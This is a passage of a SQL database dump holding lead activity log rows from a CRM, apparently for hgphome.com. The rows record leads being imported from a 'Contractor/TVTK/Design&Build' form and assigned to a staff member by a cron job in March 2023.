(235, 112, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 14:56:22', 0, '[CRON]', 0),
(236, 113, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-15 15:06:15', 0, '[CRON]', 0),
(237, 113, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-15 15:06:15', 0, '[CRON]', 0),
(238, 114, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 13:57:45', 0, '[CRON]', 0),
(239, 114, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 13:57:45', 0, '[CRON]', 0),
(240, 115, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 13:58:22', 0, '[CRON]', 0),
(241, 115, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 13:58:22', 0, '[CRON]', 0),
(242, 116, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 13:59:04', 0, '[CRON]', 0),
(243, 116, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 13:59:04', 0, '[CRON]', 0),
(244, 117, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 13:59:38', 0, '[CRON]', 0),
(245, 117, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 13:59:38', 0, '[CRON]', 0),
(246, 118, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 14:00:22', 0, '[CRON]', 0),
(247, 118, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 14:00:22', 0, '[CRON]', 0),
(248, 119, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 14:02:57', 0, '[CRON]', 0),
(249, 119, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 14:02:58', 0, '[CRON]', 0),
(250, 120, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 14:04:03', 0, '[CRON]', 0),
(251, 120, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 14:04:03', 0, '[CRON]', 0),
(252, 121, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 15:16:47', 0, '[CRON]', 0),
(253, 121, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 15:16:47', 0, '[CRON]', 0),
(254, 122, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 15:17:21', 0, '[CRON]', 0),
(255, 122, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 15:17:21', 0, '[CRON]', 0),
(256, 123, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 15:17:56', 0, '[CRON]', 0),
(257, 123, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 15:17:56', 0, '[CRON]', 0),
(260, 125, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 15:19:02', 0, '[CRON]', 0),
(261, 125, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 15:19:02', 0, '[CRON]', 0),
(262, 126, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-16 15:19:35', 0, '[CRON]', 0),
(263, 126, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-16 15:19:35', 0, '[CRON]', 0),
(267, 128, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:49:40', 0, '[CRON]', 0),
(268, 128, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:49:40', 0, '[CRON]', 0),
(269, 129, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:50:29', 0, '[CRON]', 0),
(270, 129, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:50:29', 0, '[CRON]', 0),
(271, 130, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:51:14', 0, '[CRON]', 0),
(272, 130, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:51:14', 0, '[CRON]', 0),
(273, 131, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:52:04', 0, '[CRON]', 0),
(274, 131, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:52:04', 0, '[CRON]', 0),
(275, 132, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:52:58', 0, '[CRON]', 0),
(276, 132, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:52:58', 0, '[CRON]', 0),
(277, 133, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:53:46', 0, '[CRON]', 0),
(278, 133, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:53:46', 0, '[CRON]', 0),
(279, 134, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-17 13:55:27', 0, '[CRON]', 0),
(280, 134, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-17 13:55:27', 0, '[CRON]', 0),
(281, 135, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:36:19', 0, '[CRON]', 0),
(282, 135, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:36:19', 0, '[CRON]', 0),
(283, 136, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:37:53', 0, '[CRON]', 0),
(284, 136, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:37:53', 0, '[CRON]', 0),
(285, 137, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:38:48', 0, '[CRON]', 0),
(286, 137, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:38:48', 0, '[CRON]', 0),
(287, 138, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:39:27', 0, '[CRON]', 0),
(288, 138, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:39:27', 0, '[CRON]', 0),
(289, 139, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:40:22', 0, '[CRON]', 0),
(290, 139, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:40:22', 0, '[CRON]', 0),
(291, 140, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:41:04', 0, '[CRON]', 0),
(292, 140, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:41:05', 0, '[CRON]', 0),
(293, 141, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 13:41:45', 0, '[CRON]', 0),
(294, 141, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 13:41:45', 0, '[CRON]', 0),
(295, 142, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 14:59:52', 0, '[CRON]', 0),
(296, 142, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 14:59:52', 0, '[CRON]', 0),
(297, 143, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:00:31', 0, '[CRON]', 0),
(298, 143, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:00:31', 0, '[CRON]', 0),
(299, 144, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:01:24', 0, '[CRON]', 0),
(300, 144, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:01:24', 0, '[CRON]', 0),
(301, 145, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:02:18', 0, '[CRON]', 0),
(302, 145, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:02:18', 0, '[CRON]', 0),
(303, 146, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:04:52', 0, '[CRON]', 0),
(304, 146, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:04:52', 0, '[CRON]', 0),
(305, 147, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:06:09', 0, '[CRON]', 0),
(306, 147, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:06:09', 0, '[CRON]', 0),
(307, 148, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:19:44', 0, '[CRON]', 0),
(308, 148, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:19:44', 0, '[CRON]', 0),
(309, 149, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-20 15:21:26', 0, '[CRON]', 0),
(310, 149, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-20 15:21:27', 0, '[CRON]', 0),
(311, 150, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-21 13:50:28', 0, '[CRON]', 0),
(312, 150, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-21 13:50:28', 0, '[CRON]', 0),
(313, 151, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-21 13:50:59', 0, '[CRON]', 0),
(314, 151, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-21 13:50:59', 0, '[CRON]', 0),
(315, 152, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-21 13:51:27', 0, '[CRON]', 0),
(316, 152, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-21 13:51:27', 0, '[CRON]', 0),
(317, 153, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-21 13:52:17', 0, '[CRON]', 0),
(318, 153, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-21 13:52:17', 0, '[CRON]', 0),
(319, 154, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:43:05', 0, '[CRON]', 0),
(320, 154, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:43:05', 0, '[CRON]', 0),
(321, 155, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:43:38', 0, '[CRON]', 0),
(322, 155, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:43:39', 0, '[CRON]', 0),
(323, 156, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:44:24', 0, '[CRON]', 0),
(324, 156, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:44:24', 0, '[CRON]', 0),
(325, 157, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:45:02', 0, '[CRON]', 0),
(326, 157, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:45:02', 0, '[CRON]', 0),
(327, 158, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:45:29', 0, '[CRON]', 0),
(328, 158, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:45:29', 0, '[CRON]', 0),
(329, 159, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:45:54', 0, '[CRON]', 0),
(330, 159, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:45:54', 0, '[CRON]', 0),
(331, 160, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 10:46:22', 0, '[CRON]', 0),
(332, 160, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 10:46:22', 0, '[CRON]', 0),
(335, 162, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 11:28:56', 0, '[CRON]', 0),
(336, 162, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 11:28:56', 0, '[CRON]', 0),
(337, 163, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-22 11:29:51', 0, '[CRON]', 0),
(338, 163, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-22 11:29:51', 0, '[CRON]', 0),
(339, 164, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:31:33', 0, '[CRON]', 0),
(340, 164, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:31:33', 0, '[CRON]', 0),
(341, 165, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:32:08', 0, '[CRON]', 0),
(342, 165, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:32:08', 0, '[CRON]', 0),
(343, 166, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:33:09', 0, '[CRON]', 0),
(344, 166, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:33:09', 0, '[CRON]', 0),
(345, 167, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:33:37', 0, '[CRON]', 0),
(346, 167, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:33:37', 0, '[CRON]', 0),
(347, 168, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:34:05', 0, '[CRON]', 0),
(348, 168, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:34:05', 0, '[CRON]', 0),
(349, 169, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 09:34:31', 0, '[CRON]', 0),
(350, 169, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 09:34:31', 0, '[CRON]', 0),
(351, 170, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 10:12:44', 0, '[CRON]', 0),
(352, 170, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 10:12:44', 0, '[CRON]', 0),
(355, 172, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 10:13:49', 0, '[CRON]', 0),
(356, 172, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 10:13:49', 0, '[CRON]', 0),
(357, 173, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-23 10:14:39', 0, '[CRON]', 0),
(358, 173, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-23 10:14:39', 0, '[CRON]', 0),
(359, 174, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-24 09:39:35', 0, '[CRON]', 0),
(360, 174, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-24 09:39:36', 0, '[CRON]', 0),
(361, 175, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-24 09:40:05', 0, '[CRON]', 0),
(362, 175, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-24 09:40:05', 0, '[CRON]', 0),
(363, 176, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-24 09:40:38', 0, '[CRON]', 0),
(364, 176, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-24 09:40:38', 0, '[CRON]', 0),
(367, 178, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-24 09:42:12', 0, '[CRON]', 0),
(368, 178, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-24 09:42:12', 0, '[CRON]', 0),
(369, 179, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-24 09:42:58', 0, '[CRON]', 0),
(370, 179, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-24 09:42:58', 0, '[CRON]', 0),
(371, 180, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:02:00', 0, '[CRON]', 0),
(372, 180, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:02:00', 0, '[CRON]', 0),
(373, 181, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:03:14', 0, '[CRON]', 0),
(374, 181, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:03:14', 0, '[CRON]', 0),
(375, 182, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:03:55', 0, '[CRON]', 0),
(376, 182, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:03:55', 0, '[CRON]', 0),
(377, 183, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:05:00', 0, '[CRON]', 0),
(378, 183, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:05:00', 0, '[CRON]', 0),
(379, 184, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:06:44', 0, '[CRON]', 0),
(380, 184, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:06:45', 0, '[CRON]', 0),
(381, 185, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:07:22', 0, '[CRON]', 0),
(382, 185, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:07:22', 0, '[CRON]', 0),
(383, 186, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:21:38', 0, '[CRON]', 0);
INSERT INTO `tbllead_activity_log` (`id`, `leadid`, `description`, `additional_data`, `date`, `staffid`, `full_name`, `custom_activity`) VALUES
(384, 186, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:21:38', 0, '[CRON]', 0),
(385, 187, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:23:07', 0, '[CRON]', 0),
(386, 187, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:23:07', 0, '[CRON]', 0),
(387, 188, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:50:22', 0, '[CRON]', 0),
(388, 188, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:50:22', 0, '[CRON]', 0),
(389, 189, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:51:34', 0, '[CRON]', 0),
(390, 189, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:51:34', 0, '[CRON]', 0),
(391, 190, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 09:52:18', 0, '[CRON]', 0),
(392, 190, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 09:52:18', 0, '[CRON]', 0),
(395, 192, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 11:04:17', 0, '[CRON]', 0),
(396, 192, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-03-25 11:04:17', 0, '[CRON]', 0),
(397, 193, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-03-25 11:04:45', 0, '[CRON]', 0),
